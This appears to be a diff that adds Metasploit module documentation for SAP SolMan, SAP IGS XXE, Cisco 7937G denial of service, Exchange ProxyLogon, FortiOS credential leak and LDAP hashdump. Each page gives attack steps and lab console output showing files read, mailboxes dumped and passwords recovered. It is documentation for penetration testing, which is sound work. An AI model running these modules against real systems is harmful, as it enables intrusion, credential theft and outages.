+[+] SMD Password: asdQWE123
+[*] Stop script: ginMlA2izrNi on agent: test_linux
+[*] Delete script: ginMlA2izrNi on agent: test_linux
+[*] Server stopped.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > creds
+Credentials
+===========
+
+host          origin        service           public      private    realm  private_type  JtR Format
+----          ------        -------           ------      -------    -----  ------------  ----------
+172.16.30.46  172.16.30.46  50000/tcp (soap)  j2ee_admin  asdQWE123         Password
+
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > services
+Services
+========
+
+host          port   proto  name  state  info
+----          ----   -----  ----  -----  ----
+172.16.30.46  50000  tcp    soap  open   SAP Solution Manager
+
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > vulns
+
+Vulnerabilities
+===============
+
+Timestamp                Host          Name                                                                                               References
+---------                ----          ----                                                                                               ----------
+2021-03-27 17:49:37 UTC  172.16.30.46  SAP Solution Manager remote unauthorized OS commands execution                                     CVE-2020-6207,URL-https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf,URL-https://github.com/chipik/SAP_EEM_CVE-2020-6207
+2021-03-27 17:49:41 UTC  172.16.30.14  Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
+
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > loot
+
+Loot
+====
+
+host          service  type                          name                                                            content     info                                path
+----          -------  ----                          ----                                                            -------     ----                                ----
+172.16.30.14           smdagent.secstore.properties  /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties  text/plain  SMD Agent secstore.properties file  /Users/vladimir/.msf4/loot/a228e5f820edc34bc767-20210327204941_SAP_TEST_172.16.30.14_smdagent.secstor_283920.txt
+
+```
+
+[1]: https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
+[2]: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
+[3]: https://blogs.sap.com/2016/02/16/solution-manager-72-installation-and-configuration-i-installations/
@@ -0,0 +1,168 @@
+## Vulnerable Application
+This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page
+of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These
+vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when
+submitting a POST request to the XMLCHART page to generate a new chart.
+
+Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user
+from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers
+can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable
+SAP IGS server.
+
+### Application Background
+The Internet Graphics Service (IGS) where it provides a way infrastructure to enable developers to display graphics
+in an internet browser with minimal effort. It has been integrated in several different SAP UI technologies
+where it provides a way for data from another SAP system or data source to be utilized to generate
+dynamic graphical or non-graphical output.
+
+### Installation Steps
+Steps to install and update the SAP IGS server can be found online on [this page][2].
+Additional information on configuring the IGS server can be found [here][3].
+Finally information on administering the IGS server can be found [here][4].
+
+Once set up and configured, the instances will be vulnerable on the default HTTP port 40080.
+
+## Verification Steps
+
+  1. Start msfconsole
+  1. Do: `workspace [WORKSPACE]`
+  1. Do: `use auxiliary/admin/sap/sap_igs_xmlchart_xxe`
+  1. Do: `set RHOSTS [IP]`
+  1. Do: `set FILE [remote file name]`
+  1. Do: `set action READ`
+  1. Do: `check`
+  1. Verify that the `check` method correctly identifies if the target is vulnerable or not.
+  1. Do: `run`
+  1. Verify that the contents of the file you specified were returned.
+
+## Options
+
+### FILE
+
+File to read from the remote server. Example: `/etc/passwd`
+
+### URIPATH
+
+This is the path to the XMLCHART page of the SAP IGS server that is vulnerable to XXE.
+By default it is set to `/XMLCHART`, however it can be changed if the SAP IGS server
+was installed under a different path than the web root. For example if the SAP IGS
+server was installed to the `/igs/` path under the web root, then this value would be
+set to `/igs/XMLCHART`.
+
+## Actions
+```
+   Name  Description
+   ----  -----------
+   READ  Remote file read
+   DOS   Denial Of Service
+```
+
+## Scenarios
+
+### Vulnerable SAP IGS release: 7.45 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1
+
+```
+msf6 > workspace -a SAP_TEST
+[*] Added workspace: SAP_TEST
+[*] Workspace: SAP_TEST
+msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
+RHOSTS => 172.16.30.29
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
+FILE => /etc/passwd
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
+action => READ
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
+Proxies => http:127.0.0.1:8080
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options
+
+Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
+
+   Name     Current Setting      Required  Description
+   ----     ---------------      --------  -----------
+   FILE     /etc/passwd          no        File to read from the remote server
+   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   172.16.30.29         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    40080                yes       The target port (TCP)
+   SSL      false                no        Negotiate SSL/TLS for outgoing connections
+   URIPATH  /XMLCHART            yes       Path to the SAP IGS XMLCHART page from the web root
+   VHOST                         no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   READ  Remote file read
+
+
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
+[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
+[*] Running module against 172.16.30.29
+
+[+] File: /etc/passwd content from host: 172.16.30.29
+at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
+bin:x:1:1:bin:/bin:/bin/bash
+daemon:x:2:2:Daemon:/sbin:/bin/bash
+ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
+games:x:12:100:Games account:/var/games:/bin/bash
+gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
+haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
+lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
+mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
+man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
+messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
+news:x:9:13:News system:/etc/news:/bin/bash
+nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
+ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
+polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
+postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
+pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
+puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
+root:x:0:0:root:/root:/bin/bash
+sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
+suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
+uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
+uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
+wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
+admin:x:1000:100:admin:/home/admin:/bin/bash
+j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
+sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
+sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
+[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
+Services
+========
+
+host          port   proto  name  state  info
+----          ----   -----  ----  -----  ----
+172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)
+
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns
+
+Vulnerabilities
+===============
+
+Timestamp                Host          Name                                             References
+---------                ----          ----                                             ----------
+2020-10-07 10:12:37 UTC  172.16.30.29  SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
+
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot
+
+Loot
+====
+
+host          service  type              name         content     info                  path
+----          -------  ----              ----         -------     ----                  ----
+172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
+
+```
+
+[1]: https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
+[2]: https://help.sap.com/viewer/3348e831f4024f2db0251e9daa08b783/7.5.16/en-US/4e193dbeb5c617e2e10000000a42189b.html
+[3]: https://help.sap.com/viewer/3348e831f4024f2db0251e9daa08b783/7.5.16/en-US/4e1939c9b5c617e2e10000000a42189b.html
+[4]: https://help.sap.com/viewer/3348e831f4024f2db0251e9daa08b783/7.5.16/en-US/4e193988b5c617e2e10000000a42189b.html
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+  [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
+  This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
+
+### Description
+
+  This module exploits a bug in how the conference station handles incoming SSH
+  connections that provide an incompatible key exchange. By connecting with an
+  incompatible key exchange, the device becomes nonresponsive until it is manually power cycled.
+
+## Verification Steps
+
+  1. Obtain a Cisco 7937G Conference Station.
+  2. Enable SSH Access on the device.
+  3. Start msfconsole
+  4. Do: `use auxiliary/dos/cisco/cisco_7937G_dos`
+  5. Do: `set RHOST 192.168.1.10`
+  6. Do: `run`
+  7. The conference station should now be nonresponsive until it is power cycled
+
+## Options
+
+  No options
+
+## Scenarios
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
+
+#### Successful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
+[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - Traceback (most recent call last):
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
+[-] 192.168.110.209 -     self._handler_table[ptype](self, m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
+[-] 192.168.110.209 -     self._parse_kex_init(m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
+[-] 192.168.110.209 -     raise SSHException(
+[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - 
+[*] 192.168.110.209 - dos non-reset attack completed!
+[*] 192.168.110.209 - Errors are intended.
+[*] 192.168.110.209 - Device must be power cycled to restore functionality.
+[*] Auxiliary module execution completed
+```
+
+#### Unsuccessful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled.
+[*] Auxiliary module execution completed
+```
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
+
+#### Successful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
+[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - Traceback (most recent call last):
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
+[-] 192.168.110.209 -     self._handler_table[ptype](self, m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
+[-] 192.168.110.209 -     self._parse_kex_init(m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
+[-] 192.168.110.209 -     raise SSHException(
+[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - 
+[*] 192.168.110.209 - dos non-reset attack completed!
+[*] 192.168.110.209 - Errors are intended.
+[*] 192.168.110.209 - Device must be power cycled to restore functionality.
+[*] Auxiliary module execution completed
+```
+
+#### Unsuccessful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+  [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
+  This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
+
+### Description
+
+  This module exploits a bug in how the conference station handles executing a ping via its web interface.
+  By repeatedly executing the ping function without clearing out the resulting output,
+  a DoS is caused that will reset the device after a few minutes.
+
+## Verification Steps
+
+  1. Obtain a Cisco 7937G Conference Station.
+  2. Enable Web Access on the device (default configuration).
+  3. Start msfconsole
+  4. Do: `use auxiliary/dos/cisco/cisco_7937g_dos_reboot`
+  5. Do: `set rhost 192.168.1.10`
+  6. Do: `run`
+  7. The conference station should become nonresponsive and then power cycle itself.
+
+## Options
+
+  No options
+
+## Scenarios
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
+
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Sending DoS Packets. Stand by.
+[*] 192.168.110.209 - DoS reset attack completed!
+[*] Auxiliary module execution completed
+```
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
+
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Sending DoS Packets. Stand by.
+[*] 192.168.110.209 - DoS reset attack completed!
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,161 @@
+## Vulnerable Application
+
+CVE-2021-28855 is a pre-authentication SSRF (Server Side Request Forgery) which allows an attacker to
+bypass authentication by sending specially crafted HTTP requests. This vulnerability is part of an attack
+chain used to perform an RCE (Remote Code Execution).
+
+This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013,
+Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).
+
+### Introduction
+
+This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the
+authentication and impersonating as the admin (CVE-2021-26855).
+
+By taking advantage of this vulnerability, it is possible to dump all mailboxes (emails, attachments,
+contacts, ...).
+
+All components are vulnerable by default.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/gather/exchange_proxylogon`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set EMAIL [EMAIL ADDRESS]`
+5. Do: `run`
+
+## Options
+
+### ATTACHMENTS
+
+Dump documents attached to an email. Default: true
+
+### EMAIL
+
+The email account what you want dump.
+
+### FOLDER
+
+The email folder what you want dump. Default: inbox
+
+It is also possible to use other attributes such as: drafts, sentitems, ...
+
+More info about this in the references.
+
+### METHOD
+
+HTTP Method to use for the check (only). Default: POST
+
+### TARGET
+
+Force the name of the internal Exchange server targeted.
+
+## Advanced Options
+
+### MaxEntries
+
+Override the maximum number of object to dump.
+
+## Auxiliary Actions
+
+### Dump (Contacts)
+
+Dump user contacts from exchange server.
+
+### Dump (Emails)
+
+Dump user emails from exchange server.
+
+## Scenarios
+
+```
+msf6 auxiliary(gather/exchange_proxylogon_collector) > options 
+
+Module options (auxiliary/gather/exchange_proxylogon_collector):
+
+   Name         Current Setting           Required  Description
+   ----         ---------------           --------  -----------
+   ATTACHMENTS  true                      yes       Dump documents attached to an email
+   EMAIL        gaston.lagaffe@pwned.lab  yes       The email account what you want dump
+   FOLDER       inbox                     yes       The email folder what you want dump
+   METHOD       POST                      yes       HTTP Method to use for the check (only). (Accepted: GET, POST)
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS       172.20.2.110              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT        443                       yes       The target port (TCP)
+   SSL          true                      no        Negotiate SSL/TLS for outgoing connections
+   TARGET                                 no        Force the name of the internal Exchange server targeted
+   VHOST                                  no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name           Description
+   ----           -----------
+   Dump (Emails)  Dump user emails from exchange server
+
+
+msf6 auxiliary(gather/exchange_proxylogon_collector) > run
+[*] Running module against 172.20.2.110
+
+[*] https://172.20.2.110:443 - Attempt to exploit for CVE-2021-26855
+[*]  * internal server name (EXCH2K16)
+[*] https://172.20.2.110:443 - Sending autodiscover request
+[*]  * Server: d8a7cc8c-7180-4b80-b53e-57c3449bcd4e@pwned.lab
+[*]  * LegacyDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=9b9d8cf634f44ec4a0eda5c1c7c311da-Gasto
+[*] https://172.20.2.110:443 - Sending mapi request
+[*]  * sid: S-1-5-21-3756917241-677735496-3570881102-1141 (gaston.lagaffe@pwned.lab)
+[*] https://172.20.2.110:443 - Selecting the first internal server found
+[*]  * targeting internal: server2
+[*] https://172.20.2.110:443 - Attempt to dump emails for <gaston.lagaffe@pwned.lab>
+[*]  * successfuly connected to: inbox
+[*]  * selected folder: inbox (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDAAAAA==)
+[*]  * number of email found: 4
+[*] https://172.20.2.110:443 - Processing dump of 4 items
+[*]  * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAA6ItL
+[+]  * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_455715.txt
+[*]    -> attachment: AAAYAGdhc3Rvbi5sYWdhZmZlQHB3bmVkLmxhYgBGAAAAAADrkJkCKokiS4l8mFlWE+uTBwAkbr8AAlxKQLoRtd4lI1YMAAAAAAEMAAAkbr8AAlxKQLoRtd4lI1YMAAAA6IA6AAABEgAQAFejlEQ+wzFDoBLnyMUbSk4= (Messagerie - Administrator - Outlook.pdf)
+[+]  * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_392827.pdf
+[*]    -> attachment: AAAYAGdhc3Rvbi5sYWdhZmZlQHB3bmVkLmxhYgBGAAAAAADrkJkCKokiS4l8mFlWE+uTBwAkbr8AAlxKQLoRtd4lI1YMAAAAAAEMAAAkbr8AAlxKQLoRtd4lI1YMAAAA6IA6AAABEgAQAAZVIXO5iaNNtJIokpS4aB4= (03.png)
+[+]  * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_187857.png
+[*] 
+[*]  * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAA6ItK
+[+]  * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_470603.txt
+[*] 
+[*]  * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAAAAEc
+[+]  * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_296938.txt
+[*] 
+[*]  * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAAAAEX
+[+]  * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_524052.txt
+[*] 
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/exchange_proxylogon_collector) > set action Dump\ (Contacts) 
+action => Dump (Contacts)
+msf6 auxiliary(gather/exchange_proxylogon_collector) > run
+[*] Running module against 172.20.2.110
+
+[*] https://172.20.2.110:443 - Attempt to exploit for CVE-2021-26855
+[*]  * internal server name (EXCH2K16)
+[*] https://172.20.2.110:443 - Sending autodiscover request
+[*]  * Server: d8a7cc8c-7180-4b80-b53e-57c3449bcd4e@pwned.lab
+[*]  * LegacyDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=9b9d8cf634f44ec4a0eda5c1c7c311da-Gasto
+[*] https://172.20.2.110:443 - Sending mapi request
+[*]  * sid: S-1-5-21-3756917241-677735496-3570881102-1141 (gaston.lagaffe@pwned.lab)
+[*] https://172.20.2.110:443 - Selecting the first internal server found
+[*]  * targeting internal: server2
+[*] https://172.20.2.110:443 - Attempt to dump contacts for <gaston.lagaffe@pwned.lab>
+[*]  * successfuly connected to: contacts
+[*]  * selected folder: contacts (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDgAAAA==)
+[*]  * number of contact found: 1
+[*] https://172.20.2.110:443 - Processing dump of 1 items
+[+]  * file saved to /home/mekhalleh/.msf4/loot/20210312120243_default_172.20.2.110_gaston.lagaffep_160567.txt
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/exchange_proxylogon_collector) > 
+```
+
+## References
+
+1. <https://proxylogon.com/>
+2. <https://aka.ms/exchangevulns>
+3. <https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/distinguishedfolderid>
+4. <https://github.com/3gstudent/Homework-of-Python/blob/master/ewsManage.py>
@@ -0,0 +1,74 @@
+## Vulnerable Application
+Fortinet FortiOS versions 5.4.6 to 5.4.12, 5.6.3 to 5.6.7 and 6.0.0 to 6.0.4 are vulnerable to
+a path traversal vulnerability within the SSL VPN web portal which allows unauthenticated attackers
+to download FortiOS system files through specially crafted HTTP requests.
+
+This module exploits this vulnerability to read the usernames and passwords of users currently logged
+into the FortiOS SSL VPN, which are stored in plaintext in the `/dev/cmdb/sslvpn_websession` file on
+the VPN server.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
+3. Do: set RHOSTS [IP]
+4. Do: set RPORT 10443
+5. Do: run
+
+## Options
+
+### DUMP_FORMAT
+
+Dump format. (Accepted: raw, ascii)
+
+### STORE_CRED
+
+If set, then store gathered credentials into the Metasploit creds database.
+
+## Scenarios
+
+### FortiOS 6.0
+
+```
+msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
+msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > show options
+
+Module options (auxiliary/gather/fortios_vpnssl_traversal_creds_leak):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   DUMP_FORMAT  raw              yes       Dump format. (Accepted: raw, ascii)
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT        10443            yes       The target port (TCP)
+   SSL          true             no        Negotiate SSL/TLS for outgoing connections
+   STORE_CRED   true             no        Store credential into the database.
+   TARGETURI    /remote          yes       Base path
+   THREADS      1                yes       The number of concurrent threads (max one per host)
+   VHOST                         no        HTTP server virtual host
+
+msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS *redacted*
+RHOSTS => *redacted*
+msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run
+
+[*] https://*redacted*:10443 - Trying to connect.
+[+] https://*redacted*:10443 - Vulnerable!
+[+] https://*redacted*:10443 - File saved to /home/gwillcox/.msf4/loot/20210226142747_default_*redacted*__761592.txt
+[+] https://*redacted*:10443 - 1 credential(s) found!
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds
+Credentials
+===========
+
+host            origin          service            public  private    realm  private_type  JtR Format
+----            ------          -------            ------  -------    -----  ------------  ----------
+*redacted*  *redacted*  10443/tcp (https)  admin   *redacted*         Password
+
+msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > cat /home/gwillcox/.msf4/loot/20210226142747_default_*redacted*__761592.txt
+[*] exec: cat /home/gwillcox/.msf4/loot/20210226142747_default_*redacted*__761592.txt
+
+var fgt_lang =
+�/V^Pҽ�w���V^��V^��V^*redacted*admin*redacted*RemoteUSersfull-accessroot�бmsf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
+
+```
@@ -0,0 +1,199 @@
+## Vulnerable Application
+
+### Description
+
+This module uses an LDAP connection to dump data from LDAP server
+using an anonymous or authenticated bind.
+Searching for specific attributes it collects user credentials.
+
+### Setup
+
+Tested in the wild.
+
+You may eventually setup an intentionally insecure OpenLDAP server in docker.
+The below OpenLDAP server does not have any ACL, therefore the hashPassword
+attributes are readable by anonymous clients.
+
+```
+$ git clone https://github.com/HynekPetrak/bitnami-docker-openldap.git
+$ cd bitnami-docker-openldap
+$ docker-compose up -d
+Creating bitnami-docker-openldap_openldap_1 ... done
+
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf5 auxiliary(gather/ldap_hashdump) > set RPORT 1389
+RPORT => 1389
+msf5 auxiliary(gather/ldap_hashdump) > options
+
+Module options (auxiliary/gather/ldap_hashdump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   BASE_DN                     no        LDAP base DN if you already have it
+   BIND_DN                     no        The username to authenticate to LDAP server
+   BIND_PW                     no        Password for the BIND_DN
+   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
+   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      1389             yes       The target port
+   SSL        false            no        Enable SSL on the LDAP connection
+   USER_ATTR  dn               no        LDAP attribute, that contains username
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump all LDAP data
+
+
+msf5 auxiliary(gather/ldap_hashdump) >
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against 127.0.0.1
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=example,dc=org
+[*] Dumping LDAP data from server at 127.0.0.1:1389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200801220435_default_127.0.0.1_LDAPInformation_704646.txt
+[*] Searching for attribute: userPassword
+[*] Taking dn attribute as username
+[+] Credentials found: cn=user01,ou=users,dc=example,dc=org:password1
+[+] Credentials found: cn=user02,ou=users,dc=example,dc=org:password2
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) >
+
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Dump
+
+Dump all LDAP data from the LDAP server.
+
+## Options
+
+### BASE_DN
+
+If you already have the LDAP base DN, you may set it in this option.
+
+### USER_ATTR
+
+LDAP attribute to take the user name from. Defaults to DN, however you may
+wish to change it UID, name or similar.
